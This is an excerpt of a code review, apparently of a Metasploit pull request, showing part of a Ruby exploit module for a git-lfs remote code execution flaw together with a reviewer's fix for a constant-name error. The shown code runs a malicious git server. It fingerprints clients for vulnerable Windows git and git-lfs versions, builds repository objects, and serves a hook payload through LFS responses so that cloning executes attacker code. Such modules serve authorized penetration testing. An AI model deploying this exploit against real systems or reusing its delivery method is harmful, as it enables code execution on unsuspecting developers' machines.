modules/exploits/windows/http/git_lfs_rce.rb

```diff
@@ -0,0 +1,211 @@
+    commit = GitObject.build_commit_object(tree_sha1: tree_obj.sha1)
+
+    @git_objs =
+      [
+        commit, tree_obj, git_attr_obj, git_payload_ptr
+      ]
+
+    @refs =
+      {
+        'HEAD' => 'refs/heads/master',
+        'refs/heads/master' => commit.sha1
+      }
+  end
+
+  #
+  # Determine whether or not the target is exploitable based on the User-Agent header returned from the client.
+  # The git version must be equal or less than 2.29.2 while git-lfs needs to be equal or less than 2.12.0 to be
+  # exploitable by this vulnerability.
+  #
+  # Returns +true+ if the target is suitable, else fail_with descriptive message
+  #
+  def target_suitable?(user_agent)
+    info = fingerprint_user_agent(user_agent)
+    if info[:ua_name] == Msf::HttpClients::UNKNOWN
+      fail_with(Failure::NoTarget, "The client's User-Agent string was unidentifiable: #{info}. The client needs to clone the malicious repo on windows with a git version less than 2.29.0")
+    end
+
+    if info[:os_name] == 'Windows' &&
+       ((info[:ua_name] == Msf::HttpClients::GIT && Rex::Version.new(info[:ua_ver]) <= Rex::Version.new('2.29.2')) ||
+         (info[:ua_name] == Msf::HttpClients::GITLFS && Rex::Version.new(info[:ua_ver]) <= Rex::Version.new('2.12')))
+      true
+    else
+      fail_with(Failure::NotVulnerable, "The git client needs to be running on Windows with a version equal or less than 2.29.2 while git-lfs needs to be equal or less than 2.12.0. The user agent, #{info[:ua_name]}, found was running on, #{info[:os_name]} and was at version: #{info[:ua_ver]}")
+    end
+  end
+
+  def on_request_uri(cli, req)
+    target_suitable?(req.headers['User-Agent'])
+    if req.uri.include?('git-upload-pack')
+      request = Msf::Exploit::Git::SmartHttp::Request.parse_raw_request(req)
+      case request.type
+      when 'ref-discovery'
+        response = send_refs(request)
+      when 'upload-pack'
+        response = send_requested_objs(request)
+      else
+        fail_with(Failure::UnexpectedReply, 'Git client did not send a valid request')
+      end
+    else
+      response = handle_lfs_objects(req, @hook_payload, @git_addr)
+      unless response.code == 200
+        cli.send_response(response)
+        fail_with(Failure::UnexpectedReply, 'Failed to respond to Git client\'s LFS request')
+      end
+    end
+    cli.send_response(response)
+  end
+
+  def create_git_uri
+    "/#{Faker::App.name.downcase}.git".gsub(' ', '-')
+  end
+
+  def primer
+    @git_repo_uri = datastore['GIT_URI'].empty? ? create_git_uri : datastore['GIT_URI']
+    @git_addr = URI.parse(get_uri).merge(@git_repo_uri)
+    print_status("Git repository to clone: #{@git_addr}")
+    hardcoded_uripath(@git_repo_uri)
+    hardcoded_uripath("/#{Digest::SHA256.hexdigest(@hook_payload)}")
+  end
+
+  def handle_lfs_objects(req, hook_payload, git_addr)
+    git_hook_obj = Msf::Exploit::Git::Lfs::GitObject.build_blob_object(hook_payload)
```

Comment:
I had to update this line to fix the following exception:
```
[-] Exception handling request: uninitialized constant Msf::Exploit::Git::Lfs::GitObject
Did you mean?  Msf::Exploit::Git::GitObject
```

```suggestion
    git_hook_obj = GitObject.build_blob_object(hook_payload)
```